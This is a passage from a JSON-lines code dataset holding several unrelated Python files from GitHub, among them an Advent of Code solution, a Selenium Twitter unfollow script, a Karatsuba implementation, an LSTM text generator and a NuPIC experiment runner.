exactly\nas much as they need.\n\nFortunately, every present is a box (a perfect right rectangular\nprism), which makes calculating the required wrapping paper for each\ngift a little easier: find the surface area of the box, which is\n2*l*w + 2*w*h + 2*h*l. The elves also need a little extra paper for\neach present: the area of the smallest side.\n\nAll numbers in the elves' list are in feet. How many total square feet\nof wrapping paper should they order?\n\n--- Part Two ---\n\nThe elves are also running low on ribbon. Ribbon is all the same width,\nso they only have to worry about the length they need to order, which\nthey would again like to be exact.\n\nThe ribbon required to wrap a present is the shortest distance around\nits sides, or the smallest perimeter of any one face. Each present also\nrequires a bow made out of ribbon as well; the feet of ribbon required\nfor the perfect bow is equal to the cubic feet of volume of the\npresent. Don't ask how they tie the bow, though; they'll never tell.\n\nHow many total feet of ribbon should they order?\n\"\"\"\nfrom dataclasses import dataclass\nfrom typing import Iterator, List\n\n\n@dataclass\nclass Present:\n \"\"\"Representation of a perfect right rectangular prism.\"\"\"\n\n length: int\n width: int\n height: int\n\n def __post_init__(self) -> None:\n \"\"\"Calculate remaining box dimensions.\"\"\"\n self.length_wise_area = self.length * self.width\n self.width_wise_area = self.width * self.height\n self.height_wise_area = self.height * self.length\n self.total_area = (\n 2 * self.length_wise_area\n + 2 * self.width_wise_area\n + 2 * self.height_wise_area\n )\n length_wise_perimeter = 2 * self.length + 2 * self.width\n width_wise_perimeter = 2 * self.width + 2 * self.height\n height_wise_perimeter = 2 * self.height + 2 * self.length\n perimeters = {\n length_wise_perimeter,\n width_wise_perimeter,\n height_wise_perimeter,\n }\n self.shortest_perimeter = min(perimeters)\n\n def __iter__(self) -> Iterator:\n \"\"\"Provide unpackable dimensions.\"\"\"\n return iter((self.length, self.width, self.height))\n\n\n@dataclass\nclass Calculator:\n \"\"\"Calculator to measure total square feet of wrapping paper for\n a list of presents.\n \"\"\"\n\n presents: List[Present]\n\n def calculate_wrapping_paper(self) -> int:\n \"\"\"Return total needed square feet of wrapping paper for the\n presents.\n \"\"\"\n return sum(self._calculate_square_feet(present) for present in self.presents)\n\n def calculate_ribbon(self) -> int:\n \"\"\"Return total needed length of ribbon for the presents.\"\"\"\n return sum(self._calculate_ribbon_length(present) for present in self.presents)\n\n def _calculate_square_feet(self, present: Present) -> int:\n \"\"\"Return total needed square feet of wrapping paper for a\n present.\n \"\"\"\n return present.total_area + min(\n present.length_wise_area, present.width_wise_area, present.height_wise_area\n )\n\n def _calculate_ribbon_length(self, present: Present) -> int:\n \"\"\"Return length of ribbon needed for a single present.\"\"\"\n return present.shortest_perimeter + (\n present.length * present.width * present.height\n )\n\n\nif __name__ == \"__main__\":\n with open(\"aoc_2015/inputs/day_02_part_1.txt\") as data:\n presents = [\n Present(*[int(dimension) for dimension in dimensions.split(\"x\")])\n for dimensions in data\n ]\n\n calculator = Calculator(presents)\n print(calculator.calculate_wrapping_paper())\n print(calculator.calculate_ribbon())\n","repo_name":"walshification/advent-of-code","sub_path":"aoc_2015/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39096030608","text":"# This code script is written by @recberdeniz to exercise about python selenium application for Python Programming\n# Python selenium twitter script for find\n# followed people, mutual following and just your followed.\n# Also this script can automatically unfollow just your followed people\n# Postscript: I used Mozilla Firefox as a web driver please check that your web driver option and revise the script.\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common import exceptions\nimport time\nusernames = list()\nusers = list()\nulist = list()\nmutual_list = list()\nto_getid = list()\noptions = Options()\noptions.binary_location = r'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\nbrowser = webdriver.Firefox(executable_path=r'C:\\Users\\blue_\\anaconda3\\geckodriver.exe', options=options)\nbrowser.get(\"https://twitter.com/\")\ntime.sleep(5)\nlogin = browser.find_element(By.XPATH, \"//*[@id='layers']/div/div[1]/div/div/div/div/div/div/div/div[1]/a\")\nlogin.click()\ntime.sleep(3)\nusername = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[5]/label/div/div[2]/div/input\")\nusername.send_keys(\"Enter your e-mail or username\") # twitter username or email key section\nforward = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div\")\ntime.sleep(3)\nforward.click()\ntime.sleep(3)\npassword = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[1]/div/div/div[3]/div/label/div/div[2]/div[1]/input\")\npassword.send_keys(\"Enter your password\") # twitter password key section\nuserlogin = browser.find_element(By.XPATH, \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[2]/div/div[1]/div/div/div/div/span/span\")\nuserlogin.click()\ntime.sleep(5)\nprofile_widget = browser.find_element(By.XPATH, \"//*[@id='react-root']/div/div/div[2]/header/div/div/div/div[1]/div[2]/nav/a[7]/div\")\ntime.sleep(2)\nprofile_widget.click()\ntime.sleep(5)\nfollowed_widget = browser.find_element(By.CSS_SELECTOR, \".css-4rbku5.css-18t94o4.css-901oao.r-18jsvk2.r-1loqt21.r-37j5jr.r-a023e6.r-16dba41.r-rjixqe.r-bcqeeo.r-qvutc0\")\nfollowed_widget.click()\ntime.sleep(5)\ntry:\n for followed in browser.find_elements(By.CSS_SELECTOR, \"div[data-testid='cellInnerDiv']\"):\n users.append(followed.text)\nexcept exceptions.StaleElementReferenceException:\n pass\ntime.sleep(2)\nlenOfPage = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight); var lenOfPage = document.body.scrollHeight; return lenOfPage;\")\nmatch = False\ncounter = 0\ntime.sleep(2)\nwhile match == False:\n time.sleep(3)\n lastCount = lenOfPage\n try:\n for followed in browser.find_elements(By.CSS_SELECTOR, \"div[data-testid='cellInnerDiv']\"):\n users.append(followed.text)\n time.sleep(3)\n lenOfPage = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight); var lenOfPage = document.body.scrollHeight; return lenOfPage;\")\n\n if lenOfPage == lastCount:\n match = True\n except exceptions.StaleElementReferenceException:\n pass\ntime.sleep(3)\n\nulist = list(dict.fromkeys(users)) # When browser getting data from html selector, some of elements could be duplicated, we need to remove duplicate elements\n\nfor i in ulist:\n if \"Seni takip ediyor\" in i: # It is depending on your language and \"Seni takip ediyor\" means that \"Following you\" in Turkish, please check with your language and change the string\n mutual_list.append(i)\n\njust_followed = [i for i in ulist if i not in mutual_list] # list comprehension method to subtract between followed people and mutual following\n\n# This part of code, creates three different text folder that includes all of your followed people, mutual followed and just your followed\nwith open(\"followed_people.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in ulist:\n file.write(i + \"\\n\")\n file.write(\"**************************\\n\")\n\nwith open(\"mutual_followed.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in mutual_list:\n file.write(i + \"\\n\")\n file.write(\"**************************\\n\")\n\nwith open(\"just_followed.txt\", \"w\", encoding=\"UTF-8\") as file:\n for i in just_followed:\n file.write(i + \"\\n\")\n file.write(\"**************************\\n\")\n# end of text folder process\n# Here is a setting process that before unfollowing process,\n# every list has one null cell and we need to filter and remove, thats why we put this code here.\njust_followed = filter(None, just_followed)\nfor i in just_followed:\n to_getid.append(i.split(\"\\n\"))\ntime.sleep(2)\n# Here is the last part of this application that check the username who are not followed you going to unfollow from you.\nfor i in to_getid:\n time.sleep(3)\n browser.get(\"https://twitter.com/\" + i)\n try:\n time.sleep(5)\n unf = browser.find_element(By.CSS_SELECTOR,\n \"div[data-testid='placementTracking']\")\n unf.click()\n time.sleep(2)\n unf_second = browser.find_element(By.XPATH,\n \"//*[@id='layers']/div[2]/div/div/div/div/div/div[2]/div[2]/div[2]/div[1]/div/span/span\")\n unf_second.click()\n except Exception:\n print(\"Here is a problem check this user \" + i)\ntime.sleep(3)\nbrowser.close()\n","repo_name":"recberdeniz/Python_Selenium_Twitter","sub_path":"selenium_tw_follower.py","file_name":"selenium_tw_follower.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42066710590","text":"import logging\n\nimport pandas as pd\n\nfrom configs.processed_future_movement import future_movement_config\n\nclass ReportGenerator:\n def __init__(self, input_filename, output_filename, field_configs):\n self.output_filename = output_filename\n self.field_configs = field_configs\n self.input_filename = input_filename\n\n try:\n self.input_df = pd.read_fwf(\n self.input_filename,\n colspecs=self.get_colspecs(self.field_configs),\n names=self.get_colnames(self.field_configs),\n )\n logging.debug(\"loading input from {} to the dataframe is successful\".format(self.input_filename))\n except FileNotFoundError:\n logging.exception(\"Check if the file exists or the filename is correct\".format(self.input_filename))\n raise\n\n # For testability reason the output_df is maintained as the class attribute\n # Otherwise can be a local variable before writing the CSV into the disk\n self.output_df = None\n\n @staticmethod\n def get_colspecs(field_configs):\n \"\"\"\n Receives a fields configuration object which contains list of column name names and the tuples of their starting and ending positions.\n\n Returns a list of tuples with offset off by 1 so that it can be used by Pandas to extract fixed-width data.\n \"\"\"\n global f\n logging.debug(\"extracting colspecs from field_configs\")\n try:\n # return [(f[1] - 1, f[2]) for f in field_configs]\n colspecs = []\n for f in field_configs:\n assert len(f) == 3\n assert isinstance(f[0], str)\n assert isinstance(f[1], int)\n assert isinstance(f[2], int)\n assert f[1] <= f[2]\n colspecs.append((f[1] - 1, f[2])) # Offset by since Pandas' index starts with 0\n return colspecs\n\n except (TypeError, IndexError, AssertionError):\n logging.exception(\"Error in parsing the configuration at ine {}\".format(f))\n raise\n\n @staticmethod\n def get_colnames(field_configs):\n global f\n logging.debug(\"extracting column names from field_configs\")\n # return [f[0] for f in field_configs]\n\n try:\n colnames = []\n for f in field_configs:\n assert len(f) == 3\n assert isinstance(f[0], str)\n assert f[0] # Column name cannot be empty\n colnames.append(f[0]) # Offset by 1 since Pandas' index starts with 0\n return colnames\n\n except (TypeError, IndexError, AssertionError):\n logging.exception(\"Error in parsing the configuration at ine {}\".format(f))\n raise\n\n def summary_report(self):\n \"\"\"\n Update: Separating report generation and the dataframe manipulation\n So that the dataframe manipulation can be tested in an isolated manner instead of complex mocking of files.\n\n This method is responsible for,\n For each executed trade entries\n Group by clients and product info\n Calculate sum of the total transaction amount\n Update the self.output_df\n \"\"\"\n # client_info and product_info can be list of columns, used by Pandas while doing groupby\n client_info = [\n \"client_type\",\n \"client_number\",\n \"account_number\",\n \"subaccount_number\",\n ]\n product_info = [\n \"exchange_code\",\n \"product_group_code\",\n \"symbol\",\n \"transaction_date\",\n ]\n\n # Calculate the total_transaction_amount using quantity_long - quantity_short\n self.input_df[\"total_transaction_amount\"] = self.input_df[\"quantity_long\"] - self.input_df[\"quantity_short\"]\n\n # The actual logic that does the groupby magic and calculate the sum\n self.output_df = self.input_df.groupby(client_info + product_info, as_index=False)[\"total_transaction_amount\"].sum()\n\n def generate_report(self, method):\n \"\"\"\n This method is responsible for,\n Receive method name as parameter\n Invoke the method\n Write the output_df to .csv file\n\n The method has been parameterised so that when new types of reports implemented the method name can be passed as parameter from the main function.\n \"\"\"\n\n # Invoke the method\n method(self)\n\n # Write the .csv output to the desired output filepath.\n self.output_df.to_csv(self.output_filename, index=False)\n\n logging.debug(\"Output file {} is saved to the disk\".format(self.output_filename))\n\ndef main():\n logging.basicConfig(\n level=logging.DEBUG,\n filename=\"logs/challenge.log\",\n format=\"%(asctime)s %(levelname)s %(filename)s:%(lineno)d FUNC:%(funcName)s() %(message)s\",\n )\n\n logging.debug(\"Program started\")\n\n # Create a ReportGenerator() object\n # To create ReportGenerator object we need input file, and an output filepath and a configuration object\n rg = ReportGenerator(\"data/input.txt\", \"data/output.csv\", future_movement_config)\n\n # Generate the summary report\n rg.generate_report(ReportGenerator.summary_report)\n\n logging.debug(\"Program ended\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"n3h3m/abnamro_challenge","sub_path":"report_generator.py","file_name":"report_generator.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660784057","text":"import speech_recognition as sr\r\nfrom googletrans import Translator\r\n\r\n# Function to transcribe live audio from the microphone\r\ndef transcribe_live_audio():\r\n recognizer = sr.Recognizer()\r\n\r\n # Open the microphone and start recording\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n audio = recognizer.listen(source)\r\n\r\n try:\r\n transcription = recognizer.recognize_google(audio, language=\"en-IN\")\r\n return transcription\r\n except sr.UnknownValueError:\r\n print(\"Speech recognition could not understand audio.\")\r\n return None\r\n except sr.RequestError as e:\r\n print(f\"Could not request results from Google Speech Recognition service; {e}\")\r\n return None\r\n\r\n# Function to translate text to English\r\ndef translate_text(text):\r\n translator = Translator()\r\n translated = translator.translate(text, src=\"auto\", dest=\"en\")\r\n return translated.text\r\n\r\n# Transcribe live audio\r\ntranscription = transcribe_live_audio()\r\n\r\nif transcription:\r\n print(f\"Transcription: {transcription}\")\r\n \r\n # Translate the transcription to English\r\n translation = translate_text(transcription)\r\n print(f\"Translation: {translation}\")\r\nelse:\r\n print(\"Transcription failed or empty.\")\r\n","repo_name":"lokeshwaran173/transcript","sub_path":"sih 1456/real time aud.py","file_name":"real time aud.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8623304263","text":"import logging\n\n\ndef karatsuba(x: int, y: int) -> int:\n ''' Implementation of the Karatsuba multiplication algorithm. '''\n\n # When the numbers are small enough, just do the\n # default way.\n if x < 16 or y < 16:\n return x * y\n\n # Get bit half the length of the bigger number.\n n = max(x.bit_length(), y.bit_length()) // 2\n\n # Left shift, (2 ^ n) - 1\n mask = (1 << n) - 1\n\n # Right shift, x / 2 ^ n\n a, c = x >> n, y >> n\n\n # Bitwise and.\n b, d = x & mask, y & mask\n\n # A * C.\n part_1 = karatsuba(a, c)\n # B * D.\n part_2 = karatsuba(b, d)\n # (A+B) * (C+D) - A*C - B*D\n part_3 = karatsuba(a+b, c+d) - part_1 - part_2\n\n # ((AC * 2 ^ n) + (A+B) * (C+D) - AC - BD) * 2 ^ n ) + BD.\n return (((part_1 << n) + part_3) << n) + part_2\n\n\ndef main():\n\n # Some kinda large integer.\n x = 3141592653589793238462643383279502884197169399375105820974944592\n y = 2718281828459045235360287471352662497757247093699959574966967627\n\n return karatsuba(x, y)\n\n\nif __name__ == '__main__':\n\n logging.basicConfig(level=logging.INFO)\n\n result = main()\n\n logging.info(f'The result is {result}')\n","repo_name":"ByteByBit/algorithm_implementations","sub_path":"karatsuba/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37839620291","text":"from random import randint\nj = 0\nfor i in range(50000):\n data = []\n data.append(j)\n data.append((randint(0, 9)))\n j = j + 1\n with open(\"/home/vaibhav/Desktop/linear_data40k.csv\",\"a\") as file:\n file.write(str(data))\n file.write(\"\\n\")\n\n","repo_name":"pooniavaibhav/sparkAI","sub_path":"DataCreation.py","file_name":"DataCreation.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18834969285","text":"import sys\n\nmonths = {\n 'Jan': 0,\n 'Feb': 1,\n 'Mar': 2,\n 'Apr': 3,\n 'May': 4,\n 'Jun': 5,\n 'Jul': 6,\n 'Aug': 7,\n 'Sep': 8,\n 'Oct': 9,\n 'Nov': 10,\n 'Dec': 11\n}\n\nlines = open(sys.argv[1], 'r')\n\nfor line in lines:\n line = line.strip()\n if line == '':\n continue\n \n # Make a big dict up front\n results = {i: [False for _ in range(12)] for i in range(1990, 2021)}\n dates = line.split('; ')\n \n for date in dates:\n start_string, end_string = date.split('-')\n start_month, start_year = [int(months.get(i, i)) for i in start_string.split()]\n end_month, end_year = [int(months.get(i, i))for i in end_string.split()]\n range_years = range(start_year, end_year + 1)\n\n for y in range_years:\n start_point = start_month if y == start_year else 0\n end_point = end_month + 1 if y == end_year else 12\n for month in range(start_point, end_point):\n results[y][month] = True\n\n months = sum(sum(1 for j in results[i] if j) for i in results.keys())\n print(str(months // 12))\n\nlines.close()","repo_name":"robertlagrant/codeeval","sub_path":"Easy/139/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8110716761","text":"import unittest\nfrom pyravendb.tests.test_base import TestBase\n\n\nclass TestDelete(TestBase):\n def test_put_success(self):\n self.db.put(\"testing/1\", {\"Name\": \"test\"}, None)\n response = self.db.get(\"testing/1\")\n self.assertEqual(response[\"Results\"][0][\"@metadata\"][\"@id\"], \"testing/1\")\n\n def test_put_fail(self):\n with self.assertRaises(ValueError):\n self.db.put(\"testing/2\", \"document\", None)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neil-dot-ca/RavenDB-Python-Client","sub_path":"pyravendb/tests/database_commands_tests/test_put.py","file_name":"test_put.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"23987688648","text":"import torch\nimport os\nimport torch.nn as nn\nimport numpy as np\nfrom torch.nn.utils import clip_grad_norm_\nimport argparse\nimport logging\nimport nltk\nnltk.download('punkt')\nfrom nltk.tokenize import word_tokenize\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Train a text generation model using LSTM\")\n parser.add_argument('--input_file', type=str, default=\"book1.txt\", help=\"Path to the input text file\")\n parser.add_argument('--output_file', type=str, default=\"results.txt\", help=\"Path to the output text file\")\n parser.add_argument('--embed_size', type=int, default=512, help=\"Size of the word embeddings\")\n parser.add_argument('--hidden_size', type=int, default=4096, help=\"Size of the LSTM hidden state\")\n parser.add_argument('--num_layers', type=int, default=1, help=\"Number of LSTM layers\")\n parser.add_argument('--num_epochs', type=int, default=20, help=\"Number of training epochs\")\n parser.add_argument('--batch_size', type=int, default=12, help=\"Batch size for training\")\n parser.add_argument('--timesteps', type=int, default=50, help=\"Timesteps for truncated backpropagation through time\")\n parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Learning rate for the optimizer\")\n parser.add_argument('--generated_word',type = int,default=100, help=\"How many word you want to generate\")\n args = parser.parse_args()\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[logging.StreamHandler()])\n\nembed_size = args.embed_size\nhidden_size = args.hidden_size\nnum_layers = args.num_layers\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\ntimesteps = args.timesteps\nlearning_rate = args.learning_rate\n\nclass Dic(object):\n def __init__(self):\n self.word_to_index = {}\n self.index_to_word = {}\n self.index = 0\n\n def add(self,word):\n if word not in self.word_to_index:\n self.word_to_index[word] = self.index\n self.index_to_word[self.index] = word\n self.index += 1\n\n def __len__(self):\n return len(self.word_to_index)\n\nclass Text(object):\n def __init__(self):\n self.dictionary = Dic()\n\n def get_data(self, path, batch_size):\n with open(path, \"r\", encoding='utf-8') as f:\n token = 0\n for line in f:\n tokens = word_tokenize(line)\n token += len(tokens)\n for word in tokens:\n self.dictionary.add(word)\n rep_tensor = torch.LongTensor(token)\n index = 0\n with open(path, \"r\", encoding='utf-8') as f:\n for line in f:\n tokens = word_tokenize(line)\n for word in tokens:\n if word in self.dictionary.word_to_index:\n rep_tensor[index] = self.dictionary.word_to_index[word]\n index += 1\n num_batches = rep_tensor.shape[0] // batch_size\n rep_tensor = rep_tensor[:num_batches * batch_size]\n rep_tensor = rep_tensor.view(batch_size, -1)\n return rep_tensor\n\nclass TextGen(nn.Module):\n def __init__(self,vocab_size,embed_size,hidden_size,num_layers) :\n super(TextGen,self).__init__()\n\n self.embed = nn.Embedding(vocab_size,embed_size)\n self.lstm = nn.LSTM(embed_size,hidden_size,num_layers,batch_first = True)\n self.linear = nn.Linear(hidden_size, vocab_size)\n\n def forward(self, x, h):\n x = self.embed(x)\n out, (h, c) = self.lstm(x, h)\n out = out.reshape(out.size(0) * out.size(1), out.size(2))\n out = self.linear(out)\n return out, (h, c)\n\ncorpus = Text()\nrep_tensor = corpus.get_data(args.input_file, batch_size)\nvocab_size = len(corpus.dictionary)\nnum_batches = rep_tensor.shape[1] // timesteps\n\nmodel = TextGen(vocab_size, embed_size, hidden_size, num_layers)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nfor epoch in range(num_epochs):\n states = (torch.zeros(num_layers, batch_size, hidden_size),\n torch.zeros(num_layers, batch_size, hidden_size))\n\n for i in range(0, rep_tensor.size(1) - timesteps, timesteps):\n input = rep_tensor[:, i:i + timesteps]\n target = rep_tensor[:, (i + 1):(i + 1) + timesteps]\n outputs, _ = model(input, states)\n loss = loss_fn(outputs, target.reshape(-1))\n model.zero_grad()\n loss.backward()\n clip_grad_norm_(model.parameters(), 0.5)\n optimizer.step()\n\n step = (i + 1) // timesteps\n\n logging.info(\"Epoch[{}/{}],Loss : {:.4f}\".format(epoch + 1, num_epochs, loss.item()))\n\nwith torch.no_grad():\n with open(args.output_file, \"w\") as f:\n state = (torch.zeros(num_layers, 1, hidden_size),\n torch.zeros(num_layers, 1, hidden_size))\n input = torch.randint(0, vocab_size, (1,)).long().unsqueeze(1)\n\n for i in range(args.generated_word):\n output, _ = model(input, state)\n prob = output.exp()\n word_id = torch.multinomial(prob, num_samples=1).item()\n\n input.fill_(word_id)\n\n word = corpus.dictionary.index_to_word[word_id]\n word = \"\\n\" if word == \"\" else word + \" \"\n f.write(word)\n if (i + 1) % 10 == 0:\n logging.info(\"Sampled [{}/{}] words and saved to {}\".format(i + 1, args.generated_word, args.output_file))","repo_name":"CaglarGuher/Text-Generation-using-LSTM","sub_path":"lstm_text_gen.py","file_name":"lstm_text_gen.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29241882730","text":"import numpy\nimport itertools\nimport json\nimport cPickle as pickle\nimport zlib\nfrom time import (sleep)\nimport threading\nimport multiprocessing\nimport copy\nimport datetime\nimport pymongo\nimport pprint\nimport gevent\nimport sys\nimport os\nimport cStringIO as StringIO\n\n\nfrom collections import namedtuple\nfrom Queue import Empty\nfrom multiprocessing import Queue\n\nfrom experiment_db import ExperimentDB\n\n\n\nimport nupic.frameworks.opf.opfutils\nfrom nupic.frameworks.opf.opfutils import (InferenceType,\n InferenceElement)\nimport nupic.frameworks.opf.opfhelpers as opfhelpers\nimport nupic.frameworks.opf.opfbasicenvironment as opfbasicenv\nfrom nupic.frameworks.opf.modelfactory import ModelFactory\nfrom nupic.data.dictutils import DictObj\n\nfrom runner import Runner\n\n\n\nSimulationDataElement = namedtuple('SimulationDataElement',\n ['record',\n 'modelResult',\n 'sourceScalars',\n 'sensorBUOut',\n 'SPBUOut',\n 'overlaps',\n 'nConnectedInputs',\n 'predictedCols',\n 'predictedConfidences',\n 'tpActive',\n 'tpPredicted',\n 'permanences',\n 'sensorPredicted'])\n\n############################################################################\nclass ExperimentRunner(Runner):\n\n\n def _formatActiveCells(self, activeCells):\n numCells = activeCells.sum(1)\n formattedCells = zip(numpy.where(numCells == 32)[0].tolist(),\n itertools.repeat(\"burst\"))\n singleCells = activeCells[numCells != 32, :].nonzero()\n formattedCells.extend(zip(*(l.tolist() for l in singleCells)))\n return formattedCells\n\n\n def _runExperimentLoop(self, queue):\n\n self.prevFieldPred = {}\n\n self._model.resetSequenceStates()\n\n cOut = os.fdopen(os.open(\"/tmp/cerebro.cout\", os.O_RDWR | os.O_CREAT), 'w+')\n oldC = os.dup(1)\n\n collection = ExperimentDB.getExperimentDB(self.name)\n\n while self._maxiterations == -1 or self._iteration <= self._maxiterations:\n try:\n # Get next record\n record = self._dataset.getNextRecord()\n\n except StopIteration:\n self._isFinished.set()\n return None\n\n if self._stop.isSet():\n break\n\n # Feed record to model and get prediction. Capture all the stdout as well\n os.dup2(cOut.fileno(), 1)\n\n modelResult = self._model.run(record)\n\n os.dup2(oldC, 1)\n\n cOut.seek(0)\n verboseOutput = cOut.read()\n cOut.truncate(0)\n\n modelResult.inferences['encodings'] = None\n modelResult.sensorInput.dataEncodings = None\n\n model = self._model\n sensor = model._getSensorRegion()\n sp = model._getSPRegion()\n tp = model._getTPRegion()\n cl = model._getClassifierRegion()\n\n spImp = None\n tpImp = None\n\n if sp is not None:\n spImp = sp.getSelf()._sfdr\n if tp is not None:\n tpImp = tp.getSelf()._tfdr\n clImp = cl.getSelf()._claClassifier\n\n #Copy all the pertinent data\n sourceScalars = copy.deepcopy(sensor.getOutputData('sourceOut'))\n sensorBits = sensor.getOutputData('dataOut')\n sensorBUOut = sensorBits.nonzero()[0].tolist()\n\n SPBUOut = []\n nConnectedInputs = []\n overlaps = []\n\n if spImp is not None:\n SPBUOut = sp.getOutputData('bottomUpOut').nonzero()[0].tolist()\n nConnectedInputs = spImp._allConnectedM.nNonZerosPerRow()[SPBUOut].astype('int32').tolist()\n overlaps = zip(SPBUOut,\n spImp._overlapsNoBoost[SPBUOut].astype('int32').tolist())\n\n\n TPTDOut = tp.getOutputData('topDownOut') if tp else None\n sensorTDIn = sensor.getInputData('temporalTopDownIn')\n\n permanences = {}\n predictedCols = ()\n predictedConfidences = ()\n tpInfActiveCells = ()\n tpLrnActiveCells = ()\n tpPredCells = []\n\n if TPTDOut is not None:\n predictedCols = TPTDOut.nonzero()[0].tolist()\n predictedConfidences = TPTDOut[predictedCols].tolist()\n tpInfActiveCells = self._formatActiveCells(tpImp.infActiveState['t'])\n tpLrnActiveCells = self._formatActiveCells(tpImp.lrnActiveState['t'])\n tpInfPredT_1 = self._formatActiveCells(tpImp.infPredictedState['t-1'])\n tpInfPredT = self._formatActiveCells(tpImp.infPredictedState['t'])\n tpPredCells = tpImp.infPredictedState['t'].nonzero()[0].tolist()\n\n sensorPredBits = []\n if sensorTDIn is not None:\n sensorPredBits = sensorTDIn\n\n if self.prevPredictedCols is None:\n self.prevPredictedCols = []\n self.prevTPPredictedCells = []\n self.prevPredictedConfs = []\n self.prevTPPredicted = []\n\n clPattern = clImp._patternNZHistory[-1]\n step = clImp.steps[0]\n bitHistories = {}\n\n fieldActivations = {}\n fieldPredictions = {}\n for fieldName, (start, stop) in self.fieldRanges.iteritems():\n nzBits = sensorBits[start:stop].nonzero()[0]\n fieldActivations[fieldName] = nzBits.tolist()\n nzBits = sensorPredBits[start:stop].nonzero()[0]\n fieldPredictions[fieldName] = nzBits.tolist()\n\n predictedField = self._modelDescription[\"predictedField\"]\n predictedFieldIndex = self.getFieldNames().index(self.predictedField)\n actual = modelResult.sensorInput.dataRow[predictedFieldIndex]\n\n dthandler = lambda obj: obj.isoformat() if isinstance(obj,\n datetime.datetime) \\\n else None\n record = {\"_id\":self._iteration,\n \"actual\": actual,\n \"SPBUOut\":SPBUOut,\n \"overlaps\":overlaps,\n \"predictedCols\": self.prevPredictedCols,\n \"tpInfActive\": tpInfActiveCells,\n \"tpLrnActive\": tpLrnActiveCells,\n \"tpPredicted\": self.prevTPPredictedCells,\n \"tpInfPredT_1\":tpInfPredT_1,\n \"tpInfPredT\":tpInfPredT,\n \"permanences\": permanences,\n \"overlaps\": overlaps,\n \"inferences\": json.dumps(modelResult.inferences),\n \"record\":json.dumps(modelResult.rawInput,\n default=dthandler),\n \"fieldActivations\":fieldActivations,\n #TODO: for some reason, field predictions don't need to be shifted??\n \"fieldPredictions\": fieldPredictions,\n \"verboseOutput\": verboseOutput,\n }\n\n collection.insert(record)\n\n self._dataQ.put(record)\n\n self.prevPredictedCols = predictedCols\n self.prevTPPredictedCells = tpPredCells\n self.prevPredictedConfs = predictedConfidences\n #self.prevTPPredicted = tpPredCells\n self.prevTPPredicted = None\n self.prevFieldPred = fieldPredictions\n\n self._iteration += 1\n gevent.sleep(0)\n\n os.close(oldC)\n cOut.close()\n self._isFinished.set()\n\n def auxText(self, timestep, experimentData):\n auxText = []\n import pprint\n auxText.append(\"-----------------------------------------------------------\")\n auxText.append( \"Data at time: %s\" % timestep)\n\n auxText.append(\"\\nRaw Input\")\n auxText.append(pprint.pformat(experimentData[\"record\"]))\n\n auxText.append(\"\\nInferences\")\n auxText.append(pprint.pformat(json.loads(experimentData[\"inferences\"])))\n\n #auxText.append(\"Sensor predicted\")\n #auxText.append(pprint.pformat(experimentData.sensorPredicted))\n\n # auxText.append(\"\\nOverlaps\")\n # auxText.append(pprint.pformat(experimentData[\"overlaps\"]))\n\n #auxText.append(\"\\nConfidences\")\n #auxText.append(pprint.pformat(zip(experimentData.predictedCols,\n # experimentData.predictedConfidences)))\n #\n # auxText.append(\"\\nInference TPCells\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfActive\"]))\n\n # auxText.append(\"\\ntpInfPredT_1\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfPredT_1\"]))\n\n # auxText.append(\"\\ntpInfPredT\")\n # auxText.append(pprint.pformat(experimentData[\"tpInfPredT\"]))\n\n auxText.append(\"\\nVerbose Output:\")\n auxText.append(experimentData[\"verboseOutput\"])\n\n # auxText.append(\"Weak Match Pred Cols\")\n # auxText.append(pprint.pformat(experimentData[\"predictedCols\"]))\n\n\n #auxText.append(\"\\nDecrements\")\n #auxText.append(pprint.pformat(zip(experimentData.SPBUOut,\n # 